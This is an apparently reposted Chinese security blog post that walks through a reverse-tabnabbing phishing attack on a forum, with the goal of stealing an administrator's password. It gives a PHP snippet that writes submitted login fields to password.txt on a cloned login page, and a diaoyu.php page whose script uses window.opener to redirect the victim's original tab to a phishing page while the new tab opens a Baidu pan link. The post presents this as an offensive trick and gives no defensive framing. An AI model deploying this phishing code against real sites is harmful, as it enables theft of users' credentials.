【奇技淫巧】看我如何在论坛进行钓鱼

  • A+
所属分类:安全文章

【奇技淫巧】看我如何在论坛进行钓鱼


用户点击了某个网站中带有target=”_blank”属性的超链接后,浏览器会单独新建一个标签页来显示该链接所指向的内容。但是请注意,在这一瞬间,浏览器会允许新建的标签页通过一个名为“window.opener”的浏览器API来与之前的网页进行短暂通信。


比如我要钓鱼一个论坛的后台密码,我先把他的html保存下载,然后我添加几行代码,示例代码如下:
$content = $_POST['name']
file_put_contents('password.txt',$content);
打开以后是这样的


【奇技淫巧】看我如何在论坛进行钓鱼


然后我再创建个diaoyu.php文件,事例代码如下:
<meta http-equiv="refresh" content="1;url="https://pan.baidu.com/s/1eRFAiUQ">
<script>
if(window.opener){
  window.opener.location  = "http://127.0.0.1/phish.php";
}
</script>

然后比如我发个帖,发完是这样的


【奇技淫巧】看我如何在论坛进行钓鱼


点击以后是新开标签页是调到了百度盘,如图


【奇技淫巧】看我如何在论坛进行钓鱼


但是刚刚的标签页跳到了phish.php页面,


【奇技淫巧】看我如何在论坛进行钓鱼


然后不小心输入密码以后,


【奇技淫巧】看我如何在论坛进行钓鱼


过程

【奇技淫巧】看我如何在论坛进行钓鱼




【奇技淫巧】看我如何在论坛进行钓鱼


本文始发于微信公众号(T00ls):【奇技淫巧】看我如何在论坛进行钓鱼

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: